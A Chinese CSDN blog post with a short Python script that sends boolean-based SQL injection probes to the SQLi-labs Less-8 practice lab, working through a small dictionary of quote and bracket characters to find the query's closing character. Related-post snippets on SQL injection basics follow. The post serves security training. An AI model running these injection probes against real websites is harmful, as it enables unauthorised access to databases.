SQL注入判断闭合符—自动化脚本

最新推荐文章于 2024-03-17 09:17:59 发布
最新推荐文章于 2024-03-17 09:17:59 发布
阅读量421 收藏 3
点赞数
文章标签: sql 自动化 python vscode 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48968378/article/details/121766853
版权

 1、先将字典放入与脚本同一目录下,并且安装好python的环境(建议使用python3)。

2、在目录中新建文件cmd.bat:

3、点击文件cmd.bat打开,输入python 文件(**注意在用之前修改好脚本**)。

4、如下是脚本(本实例基于SQLi-lab):

import requests
import sys
url='http://192.168.243.130:8080/Less-8/?id=3%s'
flag='You are in'  #输入标志位

#判别闭合符
def Distinguish(url):
    file=open('dictionary.txt','r') #打开字典
    content=file.readlines()
    for item in content:
        pay='%s and 1345=1344 --+'%item.replace("\n","")
        payload=url % pay
        print(payload)
        res=requests.get(payload)
        if flag not in res.content.decode("utf-8"):
            pay='%s and 1345=1345 --+'%item.replace("\n","")
            payload=url % pay
            res=requests.get(payload)
            if flag in res.content.decode("utf-8"):
                print('[-]闭合符为:%s'%item)
                break
if __name__ == '__main__':
    Distinguish(url)

 5、字典如下(字典名:dictionary.txt):

'
"
'"
')
")
]
']
"]

Emxiai
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入(Mysql):
qi_SJQ_的博客
11-06 468
1.参数闭合: 数字型大部分情况不用闭合。 字型需要闭合的有:单/双引号、小/大括号、百分号、引号组合括号。 2.请求方法判断: 在network控制台一般可以看到,或者抓包查看。 get、post、request、cookie、http头等。 ...
SQL注入自动化检测脚本
12-14
SQL注入自动化检测脚本,使用Python语言开发
Sql基础注入总结
Flynn的博客
03-12 185
思路总结 一般来说首先判断注入点是字型或者时数值型 字型 首先尝试参数带‘ “ ( %等特殊字,而得到报错信息则很有可能是字
SQL注入概述
MAPLE102424的博客
04-17 2697
SQL注入概述
pikachu靶场之SQL注入
最新发布
2303_79340715的博客
03-17 1625
个人觉得SQL注入还是挺难的,关键点在于找SQL语句的闭合,文章会比较长,要是能一关一关对着看的话,会对你有不少好处滴!!!当然啦,手搓重要,学会用sqlmap也是挺重要的哦,主要是我还不会~爆账号密码之类的信息再插一句:设置靶场的人已经告诉我们数据库是mysql了。
sqli-labs通关全解---sql语句闭合方式判断+1-4--2
cyynid的博客
01-10 1218
sql-labs -1-4-闭合方式判断
sql注入-闭合符号问题
outman23的博客
06-16 962
sql环境搭建一级目录一级目录一级目录 环境搭建 首先下载源码, 源码地址 之后下载PHPstudy或者wamp,两者都是搭建服务器的软件 我用的是PHPstudy 把源码解压到以下路径 然后进入以下路径, 打开名为“db-creds”的文件,密码改为root 最后在PHP上创建网站 注意PHP版本最好低于5.5,这里我的版本是5.2.17 一级目录 一级目录 一级目录 ...
sql注入闭合方式
qq_67667368的博客
03-31 2040
由于系统没有对输入的数据进行过滤、检测,就带入到数据库中执行SQL语句,那么当用户输入一条恶意的数据,使其与原SQL语句拼接、重组得到一条恶意的SQL语句,当数据库执行这条恶意的SQL语句时,就会把数据库中的信息暴露出来,从而泄露信息。MYSQL数据库的包容性比较强,如果你输错了数据的类型,MYSQL数据库会自动将其转换成正确的数据类型,比如输入1)、1"、1-等,只要数字后面的字不是闭合的,数据库都会把你输入的错误的数据转换成正确的数据类型。
基于Python自动化SQL注入工具开发
04-29
随着全球信息化大局的全面铺开,全世界生产力和社会经济的发展都越来越离 不开互联网,大到国家,小到组织和个人,都已经习惯了享受互联网为我们带来的 便利。然而,纷繁复杂的互联网应用背后却暗藏着巨大的安全隐患...
MSSQL SQLServer分布式集群Python自动故障转移脚本
06-15
【MSSQLSQLServer分布式集群Python自动故障转移脚本 #安装依赖 pip install pymssql #windows打包 pyinstaller -w -F mssqlScript.py ######or pyinstaller -F mssqlScript.py #windows运行 ./mssqlScript.exe ...
asp中一段防SQL注入的通用脚本
10-30
asp中一段防SQL注入的通用脚本
SQL Server镜像自动生成脚本
01-21
镜像的搭建非常繁琐,花了一点时间写了这个脚本,方便大家搭建镜像  执行完这个镜像脚本之后,好在每台机器都绑定一下hosts文件,不然的话,镜像可能会不work  192.168.1.1 WSQL01  192.168.1.2 WSQL02  192...
sql注入之时间盲注
ljj20020718的博客
11-25 306
sql注入之时间盲注
SQL注入原理及如何判断闭合
热门推荐
大大大蜜蜂的博客
09-30 1万+
一、SQL注入原理: 造成SQL注入的原因: 在没有对用户的输入进行过滤、检测的情况下,就把用户输入数据,带入到数据库中执行SQL语句。 利用SQL注入: 由于系统没有对输入的数据进行过滤、检测,就带入到数据库中执行SQL语句,那么当用户输入一条恶意的数据,使其与原SQL语句拼接、重组得到一条恶意的SQL语句,当数据库执行这条恶意的SQL语句时,就会把数据库中的信息暴露出来,从而泄露信息。 访问网页具体流程图: 在上图中,用户访问实验楼主页进行了如下过程: 1、在 Web 浏览器中输入 www.shiya
SQL注入
青影境空
02-06 296
sql注入
(学习笔记)SQL注入--基础篇
peanut5036的博客
02-16 1208
SQL注入自学笔记,适合小白,包括union注入,报错注入,与盲注
常见的sql注入类型闭合符号
weixin_41489908的博客
08-16 2113
不是少年守不住初心,而是岁月慌了人心。。。 ---- 网易云热评 一、数字型注入 1、存在注入的url www.baidu.con/aiyou.php?id=1 2、数据库查询的语句 select * from aiyou where id=1 3、测试语句 1 and 1=2 二、字型注入 1、存在注入的url www.baidu.con/aiyou.php?id=1 2、数据库查询的语句 select * from aiyou where id='1' 3、测试.
SQL注入闭合方式及万能密码
西电卢本伟的博客
03-24 2511
由万能公式想到的...请求方式GET请求POST请求SQL注入闭合方式数字型字型再看sqli-labs实验万能密码 请求方式 两种 HTTP 请求方法:GET 和 POST 在客户机和服务器之间进行请求-响应时,两种最常被用到的方法是:GET 和 POST。 ● GET - 从指定的资源请求数据。 ● POST - 向指定的资源提交要被处理的数据 GET请求 个人理解get请求其实就是通过URL来传递数据。 一个标准的URL网址,在最后有一个querystring部分,表示对页面查询,用?来表示这部分,内
sql注入基础原理及注入方式
A906003660的博客
07-20 1074
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。二、 SQL注入的简单流程第一步:判断目标站点,是否存在注入漏洞向页面传入一些指令(SQL语句,检查指令是否被执行,如果被执行,说明页面是可能存在SQL注入漏洞的;如果不能被执行,说明可能不存在SQL注入漏洞常用的闭合点: ''单引号""双引号第二步判断数据表的字段数量思路: order by字段编号。
sql注入判断闭合
11-22
SQL注入攻击是指攻击者通过在Web表单提交或输入域中输入SQL语句来获取或篡改数据库中的数据。判断SQL注入闭合是防止SQL注入攻击的一种方法。以下是两种判断闭合的方法: 1.使用转义字:在输入的数据中加入转义字,例如单引号'变成\',这样当闭合遇到转义字时,会被转义,那么没有闭合的语句就不完整了,就会报错,通过报错信息我们就可以推断出闭合。 2.使用预处理语句:预处理语句是一种在执行SQL语句之前将参数传递给SQL引擎的方法。使用预处理语句可以有效地防止SQL注入攻击。预处理语句的原理是将SQL语句和参数分开处理,先将SQL语句发送给数据库,然后再将参数发送给数据库,这样就可以避免SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值